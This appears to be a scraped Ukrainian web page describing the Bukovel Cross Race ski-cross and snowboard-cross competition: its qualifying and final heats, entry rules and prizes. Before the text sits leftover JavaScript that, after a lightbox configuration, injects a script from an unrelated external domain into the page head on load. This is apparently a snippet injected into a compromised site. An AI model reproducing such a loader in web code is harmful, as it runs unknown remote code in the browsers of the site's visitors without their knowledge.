, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Bukovel Cross Race

Snowboard Cross Snowboarding

Bukovel CROSS-RACE – одні з найбільш видовищних змагань в сезоні, які проводяться з метою популяризації та розвитку в Україні Олімпійських дисциплін Ski Cross та Snowboard Cross.

Організатор заходу, компанія Sport Production, готує спеціальну трасу для змагань з крутими віражами, хвилями та трамплінами.

Олімпійські дисципліни ski-cross і snowboard-cross лишень починають розвиватися в Україні тому змагання такого формату дуже рідко проводяться.

Спочатку відбувається кваліфікація учасників, де всі бажаючі проходять трасу на час. І тільки учасники з кращим часом потрапляють у фінальні заїзди. Згідно результатів кваліфікаційних заїздів формуються фінальні четвірки.

Фінальна частина змагань є найцікавішою у даних дисциплінах. У фінальних заїздах спортсмени стартують по чотири одночасно і лише два перші на фініші проходять у наступний заїзд, і так до перемоги. Боротьба за призові місця завжди напружена та цікава. Глядачі отримують масу емоцій спостерігаючи за змаганнями.

У змаганнях можуть приймати участь всі бажаючі у відповідних вікових категоріях, які попередньо зареєструвалися.

Дисципліна:
• ski cross (гірські лижі),
• snowboard cross (сноуборд).

Етапи змагань:
• кваліфікаційні заїзди (всі зареєстровані учасники),
• фінальні заїзди (4, 8, 16, з кращим кваліфікаційним часом).

Всі переможці отримають медалі, грамоти від організатора змагань компанії «Sport Production». А найголовніша нагорода для всіх учасників це яскраві емоції, багато адреналіну та незабутній досвід.

Menu